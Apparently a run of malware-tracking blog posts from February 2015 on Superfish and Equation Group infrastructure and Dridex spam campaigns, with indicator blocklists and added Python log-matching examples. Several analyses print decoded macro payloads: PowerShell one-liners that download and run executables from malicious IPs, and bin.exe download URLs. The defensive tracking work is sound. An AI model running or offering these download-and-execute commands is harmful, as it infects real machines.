In the light of the growing Lenovo / Superfish fuss, I set out to identify those Superfish domains and IPs that I could, for the purposes of blocking or monitoring.
The domains and IPs that I have been able to identify are here [csv].
Superfish appear to operate the following domains (and several subdomains thereof):
venn.me
best-deals-products.com
superfish.com
pin2buy.net
pintobuy.net
similarproducts.net
adowynel.com
govenn.com
group-albums.com
jewelryviewer.com
likethatapps.com
likethatdecor.com
likethatpet.com
likethatpets.com
testsdomain.info
superfish.mobi
vennit.net
superfish.us
The following IP addresses and ranges appear to be used exclusively by Superfish (some of their other domains are on shared infrastructure):
66.70.35.240/28
66.70.34.64/26
66.70.34.128/26
66.70.34.251
66.70.35.12
66.70.35.48
All of those IPs are allocated to Datapipe in the US. Superfish itself is based in Israel, which seems to be a popular place to develop adware.
Do with this data what you will, if you have any more IPs or domains then perhaps you might share them in the Comments.
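As an added example (not part of the original post), here is a small Python checker that applies the domain list above to DNS query logs, treating every subdomain of a listed domain as a hit while rejecting look-alike names that merely end in the same characters. The log line format and client addresses are constructed for the example; a real resolver log would need its own parser.

```python
# Added example: match DNS query names against the Superfish domain list above.
# Every subdomain of a listed domain is a hit; look-alike names that merely end
# with the same characters (e.g. notsuperfish.com) are not.
SUPERFISH_DOMAINS = {
    "venn.me", "best-deals-products.com", "superfish.com", "pin2buy.net",
    "pintobuy.net", "similarproducts.net", "adowynel.com", "govenn.com",
    "group-albums.com", "jewelryviewer.com", "likethatapps.com",
    "likethatdecor.com", "likethatpet.com", "likethatpets.com",
    "testsdomain.info", "superfish.mobi", "vennit.net", "superfish.us",
}


def normalise(qname):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return qname.strip().lower().rstrip(".")


def matching_domain(qname, blocklist=SUPERFISH_DOMAINS):
    """Return the blocklisted domain that qname equals or is a subdomain of, else None.

    Candidate suffixes are compared whole, label by label, so the match always
    sits on a dot boundary: a.b.superfish.com -> superfish.com, but
    notsuperfish.com and superfish.com.evil.example never match.
    """
    labels = normalise(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return candidate
    return None


def scan_dns_log(lines, blocklist=SUPERFISH_DOMAINS):
    """Return (client, qname, matched_domain) for each query that hits the list.

    Line format is constructed for this example: '<client-ip> <query-name>'.
    Malformed lines are skipped rather than aborting the scan.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 2:
            continue
        client, qname = parts
        hit = matching_domain(qname, blocklist)
        if hit:
            hits.append((client, normalise(qname), hit))
    return hits


# Constructed sample log, not real traffic.
SAMPLE_LOG = [
    "10.0.0.5 www.superfish.com",
    "10.0.0.5 static.best-deals-products.com.",
    "10.0.0.9 NOTSUPERFISH.COM",
    "10.0.0.9 superfish.com.evil.example",
    "10.0.0.7 example.org",
    "this line is malformed",
]

if __name__ == "__main__":
    for client, qname, domain in scan_dns_log(SAMPLE_LOG):
        print(f"{client} queried {qname} (matches {domain})")
```

The label-by-label comparison is the point: a naive `endswith("superfish.com")` would also fire on notsuperfish.com, and a naive `"superfish.com" in qname` would fire on superfish.com.evil.example, which belongs to nobody on the list.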
Thursday 19 February 2015
Wednesday 18 February 2015
Multiple spam emails using malicious XLS or XLSM attachment
I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.
Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]
Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm
The XLS and XLSM files differ structurally: the XLSM files are essentially Office 2007 ZIP archives of the document's component parts, while the XLS files are old-style binary Office 2003 documents. Nevertheless, both contain a macro split into 23 modules to make it harder to analyse, although the important modules are Module 11, which contains the encrypted text string, and Module 14, which contains the decryption function itself. Almost everything else is irrelevant.
Once the string is decrypted, it becomes fairly obvious what is going on. So far, there appear to be four strings with different download locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
So we can see a file dxzq.jpg being downloaded which, despite the extension, is actually a CAB file. It is saved as JIOiodfhioIH.cab, expanded to JIOiodfhioIH.exe and then run.
For information, these IPs are hosted by:
5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobyte LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)
This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:
82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63
For research purposes, a copy of the files analysed and dropped can be found here, password is infected
Malware spam: "UK Fuels Esso E-bill" / "invoices@ebillinvoice.com"
This fake invoice is a forgery with a malicious attachment:
From: invoices@ebillinvoice.com
Date: 18 February 2015 at 09:01
Subject: UK Fuels Esso E-bill
Customer No : 90714
Email address : [redacted]
Attached file name : 36890_06_2015.DOC (ZIP)
Dear Customer
Please find attached your invoice for Week 06 2015.
If you have any queries regarding your e-bill you can contact us at invoices@ebillinvoice.com.
Alternatively you can log on to your account at www.velocitycardmanagement.com to review your transactions and manage your account online.
Yours sincerely
Customer Services
UK Fuels
======================================================
This email, its content and any files transmitted with
it are confidential and intended solely for the use of
the individual(s) to whom it is addressed.
If you are not the intended recipient, be advised that
you have received this email in error and that any use,
dissemination, forwarding, printing or copying of
this email is strictly prohibited.
======================================================
I have only seen a single sample of this, with a ZIP file 36890_06_2015.zip attached, which in turn contains a document 36890_06_2015.doc. This document contains a malicious macro, and is exactly the same as the one used in this campaign leading to the Dridex banking trojan.
Malware spam: "[dan@express-insurance.net]" / "Auto insurance apps and documents"
This fake financial spam has a malicious attachment:
From: Dan Bigelow [dan@express-insurance.net]
Date: 18 February 2015 at 09:18
Subject: Auto insurance apps and documents
Hello,
Please print “All” attached forms and sign and initial where I highlighted.
Scan and email back to me or fax to me at 407-937-0511.
Sincerely,
Dan Bigelow
Referrals are important to us. If you know anyone who would benefit from our services, please contact me.
We would appreciate the opportunity to work with them.
2636 West State Rd 434 # 112
Longwood, Fl 32779
Phone 407-215-7318
Fax 407-386-1601
This spam does not actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple forgery with a malicious Word document attached.
There are actually at least two different versions of the document with zero detections [1] [2]. The macros are a bit too complex for pastebin, but you can download a ZIP here and here [password=infected].
Despite the difference, both seem to download from:
http://ecv.bookingonline.it/js/bin.exe
The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] indicate that it attempts to phone home to:
83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.
Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66
Tuesday 17 February 2015
An analysis of reported Equation Group IP ranges and domains
There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks [1] [2] [3] [4].
Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they are hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.
Securelist posts a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.
The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.
There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.
(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)
FLAG Telecom / Reliance Globalcom
62.216.152.64/28
80.77.2.160/27
80.77.4.0/26
FLAG Telecom is allegedly a partner of the NSA and GCHQ. These IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:
team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com
Verizon
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27
Verizon is another company with a long history with the NSA. These Verizon IPs are all located outside the United States, specifically in the Netherlands, Singapore, Japan and Italy. In addition to hardcoded IPs, they are hosting:
honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com
Global Telecom & Technology Americas Inc. / Cogent / PSInet
149.12.71.0/26
This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:
avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com
Colombia: Alfan Empaques Flexibles S.A. / Columbus Networks / IFX Networks / Terremark
64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:
selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com
Czech Republic: Master Internet / IT-PRO / 4D Praha
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:
islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net
Spain: Terremark / GTT Global Telecom
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
Terremark also provides hosting services for Equation in Colombia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:
businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com
Netherlands: Tripartz-Atrato / IX Reach / Claranet / FiberRing
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.
arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com
Malaysia: Piradius NET
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.
roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com
Other ranges and hosts
- RACSA in Costa Rica hosts customerscreensavers.com and xlivehost.com on 196.40.84.8/29.
- EasySpeed in Denmark hosts quik-serv.com and goldadpremium.com on 82.103.134.48/30.
- Cyber Cast International in Panama hosts havakhosh.com and toofanshadid.com on 200.115.174.254.
- EM Technologies in Panama hosts technicupdate.com and rapidlyserv.com on 201.218.238.128/26.
- INET in Thailand hosts globalnetworkanalys.com on 203.150.231.49 with an apparently hardcoded IP of 203.150.231.73 in use as well.
- American Internet Services hosts suddenplot.com on 207.158.58.102.
- GoDaddy hosts serv-load.com and wangluoruanjian.com on 97.74.104.208.
- Quadranet / GZ Systems hosts fliteilex.com plus some other questionable domains on 67.215.237.104/29.
- Vegas Linkup LLC hosts standardsandpraiserepurpose.com on 209.59.42.97.
- Vox Telecom in South Africa hosts mysaltychocolateballs.com on 41.222.35.70 having previously hosted forboringbusinesses.com.
64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70
I recommend that you look at the data before you do drastic things with these IP ranges.
Now, I don't know for certain that this malware comes from a government actor, but the IP addresses indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me.
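The consolidated list above is what most readers will actually feed into a monitoring rule, and it repays a little hygiene first: the same range appears more than once, two single hosts sit side by side, and one entry (195.128.235.225/28) has host bits set, so a strict CIDR parser will reject it outright. The following Python is an added example, not code from the original post or from Kaspersky: it normalises a subset of the ranges with the standard ipaddress module, collapses duplicates and adjacent blocks, and then checks destination addresses from a constructed flow log against the result, which is the "monitor before you block" use the post recommends.

```python
import ipaddress

# A subset of the ranges listed above, pasted as text the way one would lift
# them off the page. Note the repeated 190.60.202.0/28, the adjacent single
# hosts 81.31.34.174 / .175, and 195.128.235.225/28, whose host bits are set.
EQUATION_RANGES_TEXT = """
62.216.152.64/28
80.77.2.160/27
80.77.4.0/26
190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
149.12.71.0/26
195.108.238.128/30
195.128.235.225/28
"""


def parse_ranges(text):
    """Parse one address or CIDR per line into IPv4Network objects.

    Entries with host bits set are accepted with strict=False (so .225/28
    becomes .224/28) and returned separately so the analyst can confirm the
    intent rather than silently widening or dropping the entry.
    """
    nets, normalised = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        net = ipaddress.ip_network(line, strict=False)
        if "/" in line and str(net) != line:
            normalised.append((line, str(net)))
        nets.append(net)
    return nets, normalised


def collapse(nets):
    """Drop duplicates and merge adjacent blocks (174/32 + 175/32 -> 174/31)."""
    return list(ipaddress.collapse_addresses(nets))


def match_ip(ip, nets):
    """Return the first network containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:
            return net
    return None


def scan_flows(records, nets):
    """records: (src, dst) pairs. Returns (src, dst, range) for dsts in the list."""
    hits = []
    for src, dst in records:
        net = match_ip(dst, nets)
        if net is not None:
            hits.append((src, dst, str(net)))
    return hits


# Constructed flow records, not real traffic.
SAMPLE_FLOWS = [
    ("10.1.1.20", "190.60.202.7"),
    ("10.1.1.21", "195.128.235.230"),
    ("10.1.1.22", "81.31.34.175"),
    ("10.1.1.23", "8.8.8.8"),
]

if __name__ == "__main__":
    nets, normalised = parse_ranges(EQUATION_RANGES_TEXT)
    for before, after in normalised:
        print(f"note: {before} has host bits set, using {after}")
    watch = collapse(nets)
    print(f"{len(nets)} entries collapsed to {len(watch)} networks")
    for src, dst, rng in scan_flows(SAMPLE_FLOWS, watch):
        print(f"{src} -> {dst} is in watched range {rng}")
```

On this subset the 14 entries collapse to 11 networks. Reporting the normalised entry rather than silently fixing it matters: the page's 195.128.235.225 may be the one hardcoded host the author saw, or the author may have meant the whole /28, and those are different alerting decisions.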
Labels:
Amazon,
Colombia,
Czech Republic,
GoDaddy,
Malware,
Netherlands,
Panama,
Piradius.net,
Spain
Something evil on 92.63.88.0/24 (MWTV, Latvia)
I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:
92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108
I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.
Labels:
Dridex,
Evil Network,
Latvia,
Malware
Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"
This fake financial document has a malicious attachment:
From: AR.Support@efi.com
To: minutemanpresschicago@comcast.net
Date: 17 February 2015 at 10:22
Subject: Customer statement 0001031389 as on 02/05/2015
Dear EFI Customer,
Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.
Regards,
AR Support
AR.Support@efi.com
** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.
PO Box 742366
Los Angeles, CA. 90074-2366
Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.
Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2], containing two highly obfuscated modular macros [1] [2] that actually just perform a ROT13 transformation on a couple of strings:
uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr
Which decodes to:
http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe
This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] show the malware attempting to connect to:
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)
According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.
Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105
Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex
This fake invoice comes with no body text, a random ID in the subject and a randomly-named malicious Excel attachment.
Date: 17 February 2015 at 14:05
Subject: Unpaid invoice [ID:9876543210]
Some example attachment names are:
3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls
There are four different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different set of macros and, unlike previous spam runs, these are individual modules (which frankly makes them no harder to analyse, just harder to put into Pastebin).
When we decrypt the strings in the macro, we see:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
This combines the recent PowerShell trick with a new one. Instead of downloading an EXE file directly, it downloads a CAB file, dfssk.cab, saves it in the %TEMP% folder as JIOiodfhioIH.cab and then expands it to %TEMP%\JIOiodfhioIH.exe, which is run.
These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)
Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV, Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at 92.63.88.87.
ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)
This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243
Monday 16 February 2015
Money mule scam: gbearn.com / usaearns.com
This spam email is attempting to recruit people to aid with money laundering ("money mules") and other illegal operations.
Date: 16 February 2015 at 21:29
Subject: New offer
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on riley@gbearn.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
The reply-to domain gbearn.com has recently been registered by the scammers with false WHOIS details. There is also an equivalent domain usaearns.com for recruiting US victims.
Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1.recognizettrauma.net). The other nameserver (ns2.recognizettrauma.net) is on 75.132.186.90 (Charter Communications, US).
Be in no doubt that the job being offered here is illegal, and you should most definitely avoid it.
Labels:
Job Offer Scams,
Spam
Malware spam: "L&A Plastic Order# 66990" / "Hannah [Hannah@lapackaging.com]"
This fake financial spam does not come from LA Packaging, their systems are not compromised in any way. Instead, this is a simple forgery with a malicious attachment:
From: Hannah [Hannah@lapackaging.com]
Date: 16 February 2015 at 10:38
Subject: L&A Plastic Order# 66990
For your records, please see attached L&A Order# 66990 and credit card receipt.
It has shipped today via UPS Ground Tracking# 1Z92X9070369494933
Best Regards,
Hannah – Sales
L&A Plastic Molding / LA Packaging
714-694-0101 Tel - Ext. 110
714-694-0400 Fax
E-mail: Hannah@LAPackaging.com
Attached is a malicious Word document 66990.doc. So far I have only seen one version of this, although there are usually several variants. This document contains a macro [pastebin] which downloads an executable from:
http://hoodoba.cba.pl/js/bin.exe
At present this has a detection rate of 6/57. It is the same malware as seen in this spam run.
Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"
This rather terse spam comes with a malicious attachment:
From: Rosemary Gibbs
Date: 16 February 2015 at 10:12
Subject: Re: Data request [ID:91460-2234721]
Copy of transaction.
The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are:
869B54732.xls
BE75129513.xls
C39189051.xls
None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro (shown as a screenshot in the original post) is quite apparently ROT13 encoded, which you can easily decode at rot13.com rather than working through the macro. These three samples give us:
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
So, these macros are attempting to use PowerShell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:
85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)
It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151
Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice
This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicious attachment. Note that the taghire.co.uk site simply shows "Under Construction".
From: Lawrence Fisher [l.fisher@taghire.co.uk]
Date: 16 February 2015 at 08:25
Subject: invoice
Here is the invoice
Kind Regards,
Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield
Tel: 020 3750 0638
This e-mail is confidential and may be privileged. It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:
http://laikah.de/js/bin.exe
Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code, although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid analysis.
This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57. Automated reporting tools [1] [2] [3] show that this POSTs to 37.139.47.105. It appears that communication is attempted with the following IPs:
37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)
Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70
Saturday 14 February 2015
Spammer: Brad Smith / Unicore Health / unicorehealth.net / unicorehealth.com
This slimed its way into my mailbox:
From: Brad Smith [sales@unicorehealth.net]
To: Morgan Stanley [mstanley@redacted]
Date: 11 February 2015 at 15:24
Subject: Morgan, HR related question
Hi Morgan, could you let me know a time we could talk in the next few days? For HR managers we measure and video the essential functions and physical requirements of each key job so that clients like Coca-Cola and Publix can reduce their hiring risk and job injury risk. I thought you would like to quickly view the process, some interesting examples, and how to use them in your role. Just let me know a time that works in your schedule and I will confirm back, talk then!
Regards,
Brad Smith
VP, Product Management
Unicore Health
sales@unicorehealth.net
www.unicorehealth.net
This message is confidential and intended only for the original recipient. If you have received this message in error, please delete it or mail us back with re move in the sub ject. If any follow-up is needed I show your contact information as Morgan Stanley, mstanley@redacted and our address if needed is 3200 Downwood Circle, Ste 410, Atlanta, GA, 30327. Thank you.
Morgan Stanley? They must mean this Morgan Stanley. How did they confuse me with Morgan Stanley? Because I mention them on my website here. Now, I only know of one company that sends spam like this.. but more about them later.
Let's check the veracity of the message.. first, the mail headers.
Received: from [63.134.229.186] (port=1355 helo=mail.unicorehealth.net)
by [redacted] with esmtp (Exim 4.80)
(envelope-from <sales@unicorehealth.net>)
id 1YLZ9H-0001CT-C2
for mstanley@redacted; Wed, 11 Feb 2015 15:24:20 +0000
Received: from 31617334.unicorehealth.net
by mail.unicorehealth.net (Right Sender 3.3) with ASMTP id YRJ55117
for <mstanley@redacted>; Wed, 11 Feb 2015 10:24:17 -0500
Message-ID: <20150211102412.2e7c8b6c6f@6e5d>
From: "Brad Smith" <sales@unicorehealth.net>
To: "Morgan Stanley" <mstanley@redacted>
Subject: Morgan, HR related question
Date: Wed, 11 Feb 2015 10:24:12 -0500
X-Priority: 3
X-Mailer: SMTP-Mailer 3.4
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
